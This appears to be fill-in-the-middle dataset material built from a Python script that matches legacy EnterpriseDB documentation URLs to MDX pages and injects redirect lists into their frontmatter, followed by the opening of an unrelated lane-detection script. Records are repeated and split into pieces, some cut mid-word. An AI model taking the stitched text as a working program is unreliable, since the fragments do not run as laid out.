docs_path = 'product_docs/docs/{0}/{1}'.format(metadata['folder_name'], effective_version)
if not os.path.exists(docs_path):
# version does not match a version we have
version_missing[product].append(version)
continue
for legacy_page in product_version_data:
url = legacy_page['url']
if '/latest/' in url:
# skip latest urls if they appear, we'll handle those separately
continue
url_scheme = determine_url_scheme(url)
# if product version index page, can match right here
is_product_index = re.search(r'\/edb-docs\/p\/[\w-]+\/[\d.]+$', url)
if is_product_index:
index_path = determine_root_mdx_file(docs_path)
if index_path:
add_urls_to_output(url, index_path, output)
processed_count += 1
matched_count += 1
continue
legacy_folder = '/'.join(url.split('/')[6:8])
mdx_folder = metadata['subfolders'].get(version)
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
else:
mdx_folder = metadata['subfolders'].get('default')
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
if mdx_folder == 'skip':
skipped += 1
continue
else:
# At this point we'll say we're attempting to process this record for real
processed_count += 1
if mdx_folder == None: # don't want to catch empty string
# no metadata info for this folder
missing_folder_count += 1
missing_folder_metadata[product][version].add(legacy_folder)
continue
subfolder_docs_path = docs_path
if len(mdx_folder) > 0:
subfolder_docs_path = '{0}/{1}'.format(docs_path, mdx_folder)
if not os.path.exists(subfolder_docs_path):
# no files exist in this folder
no_files += 1
no_files_in_folder[product][version].add(subfolder_docs_path)
continue
subfolder_mdx_files = Path(subfolder_docs_path).rglob('*.mdx')
product_mdx_files = Path(docs_path).rglob('*.mdx')
match_found = False
if url_scheme == 'new':
new_count += 1
legacy_page_filename = url.split('/')[-1].replace('.html', '')
matched_file = []
for filename in subfolder_mdx_files:
mdx_page_filename = str(filename).split('/')[-1]
mdx_page_foldername = str(filename).split('/')[-2]
if (
mdx_page_filename == 'index.mdx' and
mdx_page_foldername != effective_version and
mdx_page_foldername != mdx_folder
):
mdx_page_filename = mdx_page_foldername
mdx_page_filename = re.sub(r'^\d*_', '', mdx_page_filename.replace('.mdx', ''))
if legacy_page_filename == mdx_page_filename:
add_urls_to_output(url, filename, output)
matched_count += 1
match_found = True
break # TODO handle duplicate url bug that affects some "new" style urls
# if no match found, check for files we remove
if legacy_page_filename in NEW_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
add_urls_to_output(url, index_path, output)
matched_count += 1
match_found = True
if not match_found:
new_failed_to_match[product][version][mdx_folder].append(url)
new_failed_to_match_count += 1
# print('no match found for {}'.format(url))
else:
old_count += 1
legacy_title = normalize_title(legacy_page['title'])
legacy_parents = [normalize_title(t) for t in legacy_page['sub_nav']]
print('searching for {0} under {1} in {2}'.format(legacy_title, legacy_parents, subfolder_docs_path))
title_matches = []
heading_matches = []
heading_matches_exact = []
for filename in product_mdx_files:
mdx_title = normalize_title(title_from_frontmatter(filename))
mdx_headings = headings_from_mdx(filename)
if legacy_title == mdx_title:
if str(filename).startswith(subfolder_docs_path):
output[str(filename)].append(url)
matched_count += 1
match_found = True
break
else:
title_matches.append(filename)
if legacy_title in mdx_headings:
if mdx_title in legacy_parents:
heading_matches_exact.append(filename)
heading_matches.append(filename)
if not match_found and len(heading_matches) > 0:
if heading_matches_exact:
heading_matches = heading_matches_exact
if len(heading_matches) > 1:
filtered_matches = [m for m in heading_matches if str(m).startswith(subfolder_docs_path) ]
if filtered_matches: heading_matches = filtered_matches
filename = heading_matches[0]
output[str(filename)].append(url)
matched_count += 1
match_found = True
if len(heading_matches) > 1:
print("multiple heading match")
for filename in heading_matches:
print('{0} ({1}) - {2} - {3}'.format(legacy_title, legacy_parents, filename, url))
if not match_found and len(title_matches) > 0:
filename = sorted(title_matches, key=lambda t: len(str(t)))[0]
output[str(filename)].append(url)
matched_count += 1
match_found = True
if len(title_matches) > 1:
print("multiple titles match")
for filename in title_matches:
print('{0} ({1}) - {2} - {3}'.format(legacy_title, legacy_parents, filename, url))
# if no match found, map what's new -> release notes
if not match_found and legacy_page_filename in ['whats_new.html'] and 'release_notes.mdx' in product_mdx_files:
output['release_notes.mdx'].append(url)
matched_count += 1
match_found = True
# if no match found, check for files we remove
legacy_page_filename = url.split('/')[-1].replace('.html', '')
if not match_found and legacy_page_filename in OLD_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
output[str(index_path)].append(url)
matched_count += 1
match_found = True
if match_found:
print("...FOUND!")
if not match_found:
ignore_legacy_titles = ['tableofcontents', 'introduction', 'typographicalconventionsusedinthisguide']
if legacy_title in ignore_legacy_titles: continue
old_failed_to_match[product][version][mdx_folder].append(url)
old_failed_to_match_count += 1
print('...NOT FOUND: {0} ({1}) - {2}'.format(legacy_title, legacy_parents, url))
print("\n{0}================ Report ================{1}".format(ANSI_BLUE, ANSI_STOP))
print("\n{0}-- No Metadata Configured (Not Processed) --{1}".format(ANSI_YELLOW, ANSI_STOP))
print_report(no_metadata)
print("\n{0}-- Version Missing (Not Processed) --{1}".format(ANSI_YELLOW, ANSI_STOP))
print_report(version_missing)
print("\n{0}-- Missing Folder in Metadata --{1}".format(ANSI_RED, ANSI_STOP))
print_report(missing_folder_metadata)
print("\n{0}-- No Folder --{1}".format(ANSI_RED, ANSI_STOP))
print_report(no_files_in_folder)
print("\n{0}-- Summary --{1}".format(ANSI_GREEN, ANSI_STOP))
print('matched {0} of {1} urls processed'.format(matched_count, processed_count))
print('missing folder in metadata: {0}'.format(missing_folder_count))
print('no folder: {0}'.format(no_files))
print('new style urls processed: {}'.format(new_count))
print('new style urls with no match: {}'.format(new_failed_to_match_count))
print('old style urls processed: {}'.format(old_count))
print('old style urls with no match: {}'.format(old_failed_to_match_count))
mdx_files_written = write_redirects_to_mdx_files(output)
mdx_file_count = 0
for path in Path('product_docs/docs').rglob('*.mdx'):
mdx_file_count += 1
print("wrote to {0} of {1} mdx files".format(mdx_files_written, mdx_file_count))
# print_csv_report(new_failed_to_match)
| title = re.sub(r'^\d*\.?\d*\.?\d*\.?\d*\s', '', title.strip())
title = re.sub(r'[\u2000-\u206F\u2E00-\u2E7F\\\'\-!"#$%&()*+,./:;<=>?@[\]^`{|}~’]', '', title)
title = title.lower().replace(' ', '').replace('*', '').replace('_', '').replace("\\", '').replace('™','').replace('®','')
return title
def | identifier_body |
add_legacy_redirects.py | import fileinput
import re
import json
import os
from collections import defaultdict
from pathlib import Path
# This script is still very much a work in progress.
# It does a pretty good job matching "new" style urls using a combination of
# scraped Docs 1.0 site data, and the legacy_redirects_metadata.json file.
# "Old" style urls have had initial work done to map them, but since
# we don't currently have any docs live that used "old" style urls,
# this code is commented out until it's needed (and will need to be developed further)
ANSI_STOP = '\033[0m'
ANSI_BOLD = '\033[1m'
ANSI_BLUE = '\033[34m'
ANSI_GREEN = '\033[32m'
ANSI_YELLOW = '\033[33m'
ANSI_RED = '\033[31m'
NEW_URLS_REMOVED_FILES = ['genindex', 'introduction', 'conclusion', 'whats_new']
OLD_URLS_REMOVED_FILES = ['toc']
def determine_url_scheme(url):
if re.search(r'\.\d+\.html', url) or 'toc.html' in url:
return 'old'
else:
return 'new'
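# Illustrative examples for determine_url_scheme (the urls are made up for the sketch):
#   '.../some-guide/9.6/EDB_Postgres_Guide.1.23.html' -> 'old'   (numbered ".<digits>.html" page)
#   '.../some-guide/9.6/toc.html'                     -> 'old'   (table-of-contents page)
#   '.../some-guide/13/installing_the_server.html'    -> 'new'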
def add_urls_to_output(url, path, output):
output[str(path)].append(url);
def | (output):
written = 0
for filepath in Path('product_docs/docs').rglob('*.mdx'):
redirects = output[str(filepath)]
in_frontmatter = False
injected_redirects = False
in_existing_redirect_section = False
for line in fileinput.input(files=[filepath], inplace=1):
if not injected_redirects and line.startswith('---'):
if in_frontmatter and redirects:
written = written + 1
# print redirects at the end of the frontmatter
print('legacyRedirectsGenerated:')
                    print(' # This list is generated by a script. If you need to add entries, use the `legacyRedirects` key.')
for redirect in redirects:
relative_redirect = redirect.split('https://www.enterprisedb.com')[1]
print(' - "{}"'.format(relative_redirect))
injected_redirects = True
in_frontmatter = True
# block existing legacyRedirects from being written back out
if line.startswith('legacyRedirectsGenerated:'):
in_existing_redirect_section = True
elif in_existing_redirect_section and not (line.startswith(' -') or line.lstrip().startswith('#')):
in_existing_redirect_section = False
if not in_existing_redirect_section:
print(line, end="")
return written
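# Sketch of what write_redirects_to_mdx_files injects at the end of a matched file's frontmatter
# (the title and redirect path below are placeholders, not real entries):
#
#   ---
#   title: "Some Page"
#   legacyRedirectsGenerated:
#     # This list is generated by a script. If you need to add entries, use the `legacyRedirects` key.
#     - "/edb-docs/d/some-product/user-guides/some-guide/1.0/some_page.html"
#   ---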
# These functions are only used by the commented out "old" url style handling
def title_from_frontmatter(filepath):
mdx_file = open(filepath)
for line in mdx_file:
if line.startswith('title:'):
mdx_file.close()
return line.split('title:')[1].strip().replace('"', '')
mdx_file.close()
def headings_from_mdx(filepath):
headings = []
heading_re = re.compile(r'^#+ ')
mdx_file = open(filepath)
for line in mdx_file:
if heading_re.match(line):
headings.append(
normalize_title(heading_re.sub('', line))
)
mdx_file.close()
return headings
def normalize_title(title):
title = re.sub(r'^\d*\.?\d*\.?\d*\.?\d*\s', '', title.strip())
title = re.sub(r'[\u2000-\u206F\u2E00-\u2E7F\\\'\-!"#$%&()*+,./:;<=>?@[\]^`{|}~’]', '', title)
title = title.lower().replace(' ', '').replace('*', '').replace('_', '').replace("\\", '').replace('™','').replace('®','')
return title
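# Example of normalize_title (illustrative): '3.2 Connecting to the Server!' first loses the
# leading section number, then punctuation, then case and spaces -> 'connectingtotheserver'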
def determine_root_mdx_file(docs_path, mdx_folder = None):
root_path = docs_path
if mdx_folder:
root_path += '/{}'.format(mdx_folder)
index_path = root_path + '/index.mdx'
if not os.path.exists(index_path):
return None
return index_path
def print_report(report_dict):
for key in report_dict.keys():
value = report_dict[key]
print(ANSI_BOLD + key + ANSI_STOP)
if type(value) is defaultdict:
print_report(value)
else:
print(value)
def print_csv_report(report_dict):
    print('Product,Version,Legacy Docs Folder,URL')
for product, versions in report_dict.items():
for version, folders in versions.items():
for folder, urls in folders.items():
for url in urls:
print('{0},{1},{2},{3}'.format(product, version, folder, url))
metadata_file = open(os.path.dirname(__file__) + '/legacy_redirects_metadata.json')
legacy_metadata_by_product = json.load(metadata_file)
metadata_file.close()
json_file = open(os.path.dirname(__file__) + '/legacy_docs_scrape.json')
scraped_legacy_docs_json = json.load(json_file)
json_file.close()
json_file = open(os.path.dirname(__file__) + '/equivalent_versions.json')
equivalent_versions = json.load(json_file)
json_file.close()
legacy_urls_by_product_version = defaultdict(lambda : defaultdict(list))
for data in scraped_legacy_docs_json:
if data.get('product'):
legacy_urls_by_product_version[data.get('product')][data.get('version')].append(data)
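# Each scraped record is assumed to look roughly like the following (field names inferred from
# the lookups used below; the values are placeholders):
#   {"product": "...", "version": "9.6", "url": "https://www.enterprisedb.com/edb-docs/...",
#    "title": "Some Page", "sub_nav": ["Parent Section"]}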
processed_count = 0
matched_count = 0
new_count = 0
old_count = 0
missing_folder_count = 0
skipped = 0
no_files = 0
new_failed_to_match = []
new_failed_to_match_count = 0
old_failed_to_match = []
old_failed_to_match_count = 0
no_metadata = defaultdict(lambda : [])
version_missing = defaultdict(lambda : [])
missing_folder_metadata = defaultdict(lambda : defaultdict(set))
no_files_in_folder = defaultdict(lambda : defaultdict(set))
new_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
old_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
output = defaultdict(lambda : [])
for product in legacy_urls_by_product_version.keys():
product_data = legacy_urls_by_product_version[product]
for version in product_data.keys():
product_version_data = product_data[version]
effective_version = version
if product in equivalent_versions and version in equivalent_versions.get(product):
effective_version = equivalent_versions.get(product).get(version)
metadata = legacy_metadata_by_product.get(product)
if not metadata:
# no metadata configured for product
no_metadata[product].append(version)
continue
docs_path = 'product_docs/docs/{0}/{1}'.format(metadata['folder_name'], effective_version)
if not os.path.exists(docs_path):
# version does not match a version we have
version_missing[product].append(version)
continue
for legacy_page in product_version_data:
url = legacy_page['url']
if '/latest/' in url:
# skip latest urls if they appear, we'll handle those separately
continue
url_scheme = determine_url_scheme(url)
# if product version index page, can match right here
is_product_index = re.search(r'\/edb-docs\/p\/[\w-]+\/[\d.]+$', url)
if is_product_index:
index_path = determine_root_mdx_file(docs_path)
if index_path:
add_urls_to_output(url, index_path, output)
processed_count += 1
matched_count += 1
continue
legacy_folder = '/'.join(url.split('/')[6:8])
mdx_folder = metadata['subfolders'].get(version)
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
else:
mdx_folder = metadata['subfolders'].get('default')
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
if mdx_folder == 'skip':
skipped += 1
continue
else:
# At this point we'll say we're attempting to process this record for real
processed_count += 1
if mdx_folder == None: # don't want to catch empty string
# no metadata info for this folder
missing_folder_count += 1
missing_folder_metadata[product][version].add(legacy_folder)
continue
subfolder_docs_path = docs_path
if len(mdx_folder) > 0:
subfolder_docs_path = '{0}/{1}'.format(docs_path, mdx_folder)
if not os.path.exists(subfolder_docs_path):
# no files exist in this folder
no_files += 1
no_files_in_folder[product][version].add(subfolder_docs_path)
continue
subfolder_mdx_files = Path(subfolder_docs_path).rglob('*.mdx')
product_mdx_files = Path(docs_path).rglob('*.mdx')
match_found = False
if url_scheme == 'new':
new_count += 1
legacy_page_filename = url.split('/')[-1].replace('.html', '')
matched_file = []
for filename in subfolder_mdx_files:
mdx_page_filename = str(filename).split('/')[-1]
mdx_page_foldername = str(filename).split('/')[-2]
if (
mdx_page_filename == 'index.mdx' and
mdx_page_foldername != effective_version and
mdx_page_foldername != mdx_folder
):
mdx_page_filename = mdx_page_foldername
mdx_page_filename = re.sub(r'^\d*_', '', mdx_page_filename.replace('.mdx', ''))
if legacy_page_filename == mdx_page_filename:
add_urls_to_output(url, filename, output)
matched_count += 1
match_found = True
break # TODO handle duplicate url bug that affects some "new" style urls
# if no match found, check for files we remove
if legacy_page_filename in NEW_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
add_urls_to_output(url, index_path, output)
matched_count += 1
match_found = True
if not match_found:
new_failed_to_match[product][version][mdx_folder].append(url)
new_failed_to_match_count += 1
# print('no match found for {}'.format(url))
else:
old_count += 1
legacy_title = normalize_title(legacy_page['title'])
legacy_parents = [normalize_title(t) for t in legacy_page['sub_nav']]
print('searching for {0} under {1} in {2}'.format(legacy_title, legacy_parents, subfolder_docs_path))
title_matches = []
heading_matches = []
heading_matches_exact = []
for filename in product_mdx_files:
mdx_title = normalize_title(title_from_frontmatter(filename))
mdx_headings = headings_from_mdx(filename)
if legacy_title == mdx_title:
if str(filename).startswith(subfolder_docs_path):
output[str(filename)].append(url)
matched_count += 1
match_found = True
break
else:
title_matches.append(filename)
if legacy_title in mdx_headings:
if mdx_title in legacy_parents:
heading_matches_exact.append(filename)
heading_matches.append(filename)
if not match_found and len(heading_matches) > 0:
if heading_matches_exact:
heading_matches = heading_matches_exact
if len(heading_matches) > 1:
filtered_matches = [m for m in heading_matches if str(m).startswith(subfolder_docs_path) ]
if filtered_matches: heading_matches = filtered_matches
filename = heading_matches[0]
output[str(filename)].append(url)
matched_count += 1
match_found = True
if len(heading_matches) > 1:
print("multiple heading match")
for filename in heading_matches:
print('{0} ({1}) - {2} - {3}'.format(legacy_title, legacy_parents, filename, url))
if not match_found and len(title_matches) > 0:
filename = sorted(title_matches, key=lambda t: len(str(t)))[0]
output[str(filename)].append(url)
matched_count += 1
match_found = True
if len(title_matches) > 1:
print("multiple titles match")
for filename in title_matches:
print('{0} ({1}) - {2} - {3}'.format(legacy_title, legacy_parents, filename, url))
# if no match found, map what's new -> release notes
if not match_found and legacy_page_filename in ['whats_new.html'] and 'release_notes.mdx' in product_mdx_files:
output['release_notes.mdx'].append(url)
matched_count += 1
match_found = True
# if no match found, check for files we remove
legacy_page_filename = url.split('/')[-1].replace('.html', '')
if not match_found and legacy_page_filename in OLD_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
output[str(index_path)].append(url)
matched_count += 1
match_found = True
if match_found:
print("...FOUND!")
if not match_found:
ignore_legacy_titles = ['tableofcontents', 'introduction', 'typographicalconventionsusedinthisguide']
if legacy_title in ignore_legacy_titles: continue
old_failed_to_match[product][version][mdx_folder].append(url)
old_failed_to_match_count += 1
print('...NOT FOUND: {0} ({1}) - {2}'.format(legacy_title, legacy_parents, url))
print("\n{0}================ Report ================{1}".format(ANSI_BLUE, ANSI_STOP))
print("\n{0}-- No Metadata Configured (Not Processed) --{1}".format(ANSI_YELLOW, ANSI_STOP))
print_report(no_metadata)
print("\n{0}-- Version Missing (Not Processed) --{1}".format(ANSI_YELLOW, ANSI_STOP))
print_report(version_missing)
print("\n{0}-- Missing Folder in Metadata --{1}".format(ANSI_RED, ANSI_STOP))
print_report(missing_folder_metadata)
print("\n{0}-- No Folder --{1}".format(ANSI_RED, ANSI_STOP))
print_report(no_files_in_folder)
print("\n{0}-- Summary --{1}".format(ANSI_GREEN, ANSI_STOP))
print('matched {0} of {1} urls processed'.format(matched_count, processed_count))
print('missing folder in metadata: {0}'.format(missing_folder_count))
print('no folder: {0}'.format(no_files))
print('new style urls processed: {}'.format(new_count))
print('new style urls with no match: {}'.format(new_failed_to_match_count))
print('old style urls processed: {}'.format(old_count))
print('old style urls with no match: {}'.format(old_failed_to_match_count))
mdx_files_written = write_redirects_to_mdx_files(output)
mdx_file_count = 0
for path in Path('product_docs/docs').rglob('*.mdx'):
mdx_file_count += 1
print("wrote to {0} of {1} mdx files".format(mdx_files_written, mdx_file_count))
# print_csv_report(new_failed_to_match)
| write_redirects_to_mdx_files | identifier_name |
add_legacy_redirects.py | import fileinput
import re
import json
import os
from collections import defaultdict
from pathlib import Path
# This script is still very much a work in progress.
# It does a pretty good job matching "new" style urls using a combination of
# scraped Docs 1.0 site data, and the legacy_redirects_metadata.json file.
# "Old" style urls have had initial work done to map them, but since
# we don't currently have any docs live that used "old" style urls,
# this code is commented out until it's needed (and will need to be developed further)
ANSI_STOP = '\033[0m'
ANSI_BOLD = '\033[1m'
ANSI_BLUE = '\033[34m'
ANSI_GREEN = '\033[32m'
ANSI_YELLOW = '\033[33m'
ANSI_RED = '\033[31m'
NEW_URLS_REMOVED_FILES = ['genindex', 'introduction', 'conclusion', 'whats_new']
OLD_URLS_REMOVED_FILES = ['toc']
def determine_url_scheme(url):
if re.search(r'\.\d+\.html', url) or 'toc.html' in url:
return 'old'
else:
return 'new'
def add_urls_to_output(url, path, output):
output[str(path)].append(url);
def write_redirects_to_mdx_files(output):
written = 0
for filepath in Path('product_docs/docs').rglob('*.mdx'):
redirects = output[str(filepath)]
in_frontmatter = False
injected_redirects = False
in_existing_redirect_section = False
for line in fileinput.input(files=[filepath], inplace=1):
if not injected_redirects and line.startswith('---'):
if in_frontmatter and redirects:
written = written + 1
# print redirects at the end of the frontmatter
print('legacyRedirectsGenerated:')
                    print(' # This list is generated by a script. If you need to add entries, use the `legacyRedirects` key.')
for redirect in redirects:
relative_redirect = redirect.split('https://www.enterprisedb.com')[1]
print(' - "{}"'.format(relative_redirect))
injected_redirects = True
in_frontmatter = True
# block existing legacyRedirects from being written back out
if line.startswith('legacyRedirectsGenerated:'):
in_existing_redirect_section = True
elif in_existing_redirect_section and not (line.startswith(' -') or line.lstrip().startswith('#')):
in_existing_redirect_section = False
if not in_existing_redirect_section:
print(line, end="")
return written
# These functions are only used by the commented out "old" url style handling
def title_from_frontmatter(filepath):
mdx_file = open(filepath)
for line in mdx_file:
if line.startswith('title:'):
mdx_file.close()
return line.split('title:')[1].strip().replace('"', '')
mdx_file.close()
def headings_from_mdx(filepath):
headings = []
heading_re = re.compile(r'^#+ ')
mdx_file = open(filepath)
for line in mdx_file:
if heading_re.match(line):
headings.append(
normalize_title(heading_re.sub('', line))
)
mdx_file.close()
return headings
def normalize_title(title):
title = re.sub(r'^\d*\.?\d*\.?\d*\.?\d*\s', '', title.strip())
title = re.sub(r'[\u2000-\u206F\u2E00-\u2E7F\\\'\-!"#$%&()*+,./:;<=>?@[\]^`{|}~’]', '', title)
title = title.lower().replace(' ', '').replace('*', '').replace('_', '').replace("\\", '').replace('™','').replace('®','')
return title
def determine_root_mdx_file(docs_path, mdx_folder = None):
root_path = docs_path
if mdx_folder:
root_path += '/{}'.format(mdx_folder)
index_path = root_path + '/index.mdx'
if not os.path.exists(index_path):
return None
return index_path
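# determine_root_mdx_file just probes for an index.mdx, e.g. (paths illustrative):
#   determine_root_mdx_file('product_docs/docs/<folder_name>/13')               -> '.../13/index.mdx' or None
#   determine_root_mdx_file('product_docs/docs/<folder_name>/13', 'some_guide') -> '.../13/some_guide/index.mdx' or None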
def print_report(report_dict):
for key in report_dict.keys():
value = report_dict[key]
print(ANSI_BOLD + key + ANSI_STOP)
if type(value) is defaultdict:
print_report(value)
else:
print(value)
def print_csv_report(report_dict):
    print('Product,Version,Legacy Docs Folder,URL')
for product, versions in report_dict.items():
for version, folders in versions.items():
for folder, urls in folders.items():
for url in urls:
print('{0},{1},{2},{3}'.format(product, version, folder, url))
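# A row printed by print_csv_report therefore looks like (values illustrative):
#   Some Product,9.6,user-guides/some-guide,https://www.enterprisedb.com/edb-docs/...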
metadata_file = open(os.path.dirname(__file__) + '/legacy_redirects_metadata.json')
legacy_metadata_by_product = json.load(metadata_file)
metadata_file.close()
json_file = open(os.path.dirname(__file__) + '/legacy_docs_scrape.json')
scraped_legacy_docs_json = json.load(json_file)
json_file.close()
json_file = open(os.path.dirname(__file__) + '/equivalent_versions.json')
equivalent_versions = json.load(json_file)
json_file.close()
legacy_urls_by_product_version = defaultdict(lambda : defaultdict(list))
for data in scraped_legacy_docs_json:
if data.get('product'):
legacy_urls_by_product_version[data.get('product')][data.get('version')].append(data)
processed_count = 0
matched_count = 0
new_count = 0
old_count = 0
missing_folder_count = 0
skipped = 0
no_files = 0
new_failed_to_match = []
new_failed_to_match_count = 0
old_failed_to_match = []
old_failed_to_match_count = 0
no_metadata = defaultdict(lambda : [])
version_missing = defaultdict(lambda : [])
missing_folder_metadata = defaultdict(lambda : defaultdict(set))
no_files_in_folder = defaultdict(lambda : defaultdict(set))
new_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
old_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
output = defaultdict(lambda : [])
for product in legacy_urls_by_product_version.keys():
produ | int("\n{0}================ Report ================{1}".format(ANSI_BLUE, ANSI_STOP))
print("\n{0}-- No Metadata Configured (Not Processed) --{1}".format(ANSI_YELLOW, ANSI_STOP))
print_report(no_metadata)
print("\n{0}-- Version Missing (Not Processed) --{1}".format(ANSI_YELLOW, ANSI_STOP))
print_report(version_missing)
print("\n{0}-- Missing Folder in Metadata --{1}".format(ANSI_RED, ANSI_STOP))
print_report(missing_folder_metadata)
print("\n{0}-- No Folder --{1}".format(ANSI_RED, ANSI_STOP))
print_report(no_files_in_folder)
print("\n{0}-- Summary --{1}".format(ANSI_GREEN, ANSI_STOP))
print('matched {0} of {1} urls processed'.format(matched_count, processed_count))
print('missing folder in metadata: {0}'.format(missing_folder_count))
print('no folder: {0}'.format(no_files))
print('new style urls processed: {}'.format(new_count))
print('new style urls with no match: {}'.format(new_failed_to_match_count))
print('old style urls processed: {}'.format(old_count))
print('old style urls with no match: {}'.format(old_failed_to_match_count))
mdx_files_written = write_redirects_to_mdx_files(output)
mdx_file_count = 0
for path in Path('product_docs/docs').rglob('*.mdx'):
mdx_file_count += 1
print("wrote to {0} of {1} mdx files".format(mdx_files_written, mdx_file_count))
# print_csv_report(new_failed_to_match)
| ct_data = legacy_urls_by_product_version[product]
for version in product_data.keys():
product_version_data = product_data[version]
effective_version = version
if product in equivalent_versions and version in equivalent_versions.get(product):
effective_version = equivalent_versions.get(product).get(version)
metadata = legacy_metadata_by_product.get(product)
if not metadata:
# no metadata configured for product
no_metadata[product].append(version)
continue
docs_path = 'product_docs/docs/{0}/{1}'.format(metadata['folder_name'], effective_version)
if not os.path.exists(docs_path):
# version does not match a version we have
version_missing[product].append(version)
continue
for legacy_page in product_version_data:
url = legacy_page['url']
if '/latest/' in url:
# skip latest urls if they appear, we'll handle those separately
continue
url_scheme = determine_url_scheme(url)
# if product version index page, can match right here
is_product_index = re.search(r'\/edb-docs\/p\/[\w-]+\/[\d.]+$', url)
if is_product_index:
index_path = determine_root_mdx_file(docs_path)
if index_path:
add_urls_to_output(url, index_path, output)
processed_count += 1
matched_count += 1
continue
legacy_folder = '/'.join(url.split('/')[6:8])
mdx_folder = metadata['subfolders'].get(version)
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
else:
mdx_folder = metadata['subfolders'].get('default')
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
if mdx_folder == 'skip':
skipped += 1
continue
else:
# At this point we'll say we're attempting to process this record for real
processed_count += 1
if mdx_folder == None: # don't want to catch empty string
# no metadata info for this folder
missing_folder_count += 1
missing_folder_metadata[product][version].add(legacy_folder)
continue
subfolder_docs_path = docs_path
if len(mdx_folder) > 0:
subfolder_docs_path = '{0}/{1}'.format(docs_path, mdx_folder)
if not os.path.exists(subfolder_docs_path):
# no files exist in this folder
no_files += 1
no_files_in_folder[product][version].add(subfolder_docs_path)
continue
subfolder_mdx_files = Path(subfolder_docs_path).rglob('*.mdx')
product_mdx_files = Path(docs_path).rglob('*.mdx')
match_found = False
if url_scheme == 'new':
new_count += 1
legacy_page_filename = url.split('/')[-1].replace('.html', '')
matched_file = []
for filename in subfolder_mdx_files:
mdx_page_filename = str(filename).split('/')[-1]
mdx_page_foldername = str(filename).split('/')[-2]
if (
mdx_page_filename == 'index.mdx' and
mdx_page_foldername != effective_version and
mdx_page_foldername != mdx_folder
):
mdx_page_filename = mdx_page_foldername
mdx_page_filename = re.sub(r'^\d*_', '', mdx_page_filename.replace('.mdx', ''))
if legacy_page_filename == mdx_page_filename:
add_urls_to_output(url, filename, output)
matched_count += 1
match_found = True
break # TODO handle duplicate url bug that affects some "new" style urls
# if no match found, check for files we remove
if legacy_page_filename in NEW_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
add_urls_to_output(url, index_path, output)
matched_count += 1
match_found = True
if not match_found:
new_failed_to_match[product][version][mdx_folder].append(url)
new_failed_to_match_count += 1
# print('no match found for {}'.format(url))
else:
old_count += 1
legacy_title = normalize_title(legacy_page['title'])
legacy_parents = [normalize_title(t) for t in legacy_page['sub_nav']]
print('searching for {0} under {1} in {2}'.format(legacy_title, legacy_parents, subfolder_docs_path))
title_matches = []
heading_matches = []
heading_matches_exact = []
for filename in product_mdx_files:
mdx_title = normalize_title(title_from_frontmatter(filename))
mdx_headings = headings_from_mdx(filename)
if legacy_title == mdx_title:
if str(filename).startswith(subfolder_docs_path):
output[str(filename)].append(url)
matched_count += 1
match_found = True
break
else:
title_matches.append(filename)
if legacy_title in mdx_headings:
if mdx_title in legacy_parents:
heading_matches_exact.append(filename)
heading_matches.append(filename)
if not match_found and len(heading_matches) > 0:
if heading_matches_exact:
heading_matches = heading_matches_exact
if len(heading_matches) > 1:
filtered_matches = [m for m in heading_matches if str(m).startswith(subfolder_docs_path) ]
if filtered_matches: heading_matches = filtered_matches
filename = heading_matches[0]
output[str(filename)].append(url)
matched_count += 1
match_found = True
if len(heading_matches) > 1:
print("multiple heading match")
for filename in heading_matches:
print('{0} ({1}) - {2} - {3}'.format(legacy_title, legacy_parents, filename, url))
if not match_found and len(title_matches) > 0:
filename = sorted(title_matches, key=lambda t: len(str(t)))[0]
output[str(filename)].append(url)
matched_count += 1
match_found = True
if len(title_matches) > 1:
print("multiple titles match")
for filename in title_matches:
print('{0} ({1}) - {2} - {3}'.format(legacy_title, legacy_parents, filename, url))
# if no match found, map what's new -> release notes
if not match_found and legacy_page_filename in ['whats_new.html'] and 'release_notes.mdx' in product_mdx_files:
output['release_notes.mdx'].append(url)
matched_count += 1
match_found = True
# if no match found, check for files we remove
legacy_page_filename = url.split('/')[-1].replace('.html', '')
if not match_found and legacy_page_filename in OLD_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
output[str(index_path)].append(url)
matched_count += 1
match_found = True
if match_found:
print("...FOUND!")
if not match_found:
ignore_legacy_titles = ['tableofcontents', 'introduction', 'typographicalconventionsusedinthisguide']
if legacy_title in ignore_legacy_titles: continue
old_failed_to_match[product][version][mdx_folder].append(url)
old_failed_to_match_count += 1
print('...NOT FOUND: {0} ({1}) - {2}'.format(legacy_title, legacy_parents, url))
pr | conditional_block |
Pipeline_for_videos.py | # -*- coding: utf-8 -*-
"""
Created on Wed Nov 11 09:43:43 2020
@author: Admin
"""
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import cv2
import pickle
from moviepy.editor import *
fin=[]
out = np.arange(0,250)/250
#print(out.shape)
out1= np.ones(100)
#print(out1.shape)
out2=np.arange(400,350,-1)/400
#print(out2.shape)
out3=np.zeros(400)
#print(out3.shape)
out4=np.arange(800,850,1)/850
#print(out4.shape)
out5=np.ones(100)
#print(out5.shape)
out6 = np.arange(1100,950,-1)/1100
out7=np.zeros(180)
fin = np.concatenate((out, out1, out2,out3,out4,out5,out6,out7))
fin = np.expand_dims(fin,axis=1)
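# The concatenated weight vector above has length 250+100+50+400+50+100+150+180 = 1280, i.e. one
# weight per pixel column of the 1280-wide frame.  It rises to 1 around the expected left lane
# base (~x=250-350) and right lane base (~x=850-950) and drops to 0 across the lane centre and at
# the image edges, so the histogram peaks that seed the sliding-window search are biased toward
# plausible lane-base positions.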
